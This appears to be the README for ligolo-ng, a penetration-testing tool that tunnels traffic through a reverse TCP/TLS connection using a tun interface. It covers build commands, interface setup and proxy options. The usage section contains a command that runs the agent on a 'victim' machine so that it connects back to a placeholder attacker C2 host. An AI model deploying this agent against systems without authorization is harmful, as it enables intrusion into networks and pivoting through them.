ligolo-ng

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

Install: (Download)

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Install: (Build)

Building ligolo-ng (Go >= 1.17 is required):

go build -o agent cmd/agent/main.go
go build -o proxy cmd/proxy/main.go

# Build for Windows
GOOS=windows go build -o agent.exe cmd/agent/main.go
GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup: (Linux)

sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

Setup: (Windows)

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Setup: (Proxy server)

./proxy -h # Help options
./proxy -autocert # Automatically request LetsEncrypt certificates

Usage:

Start the agent on your target (victim) computer (no privileges are required!):

./agent -connect attacker_c2_server.com:11601

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng » session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Full usage information can be found here.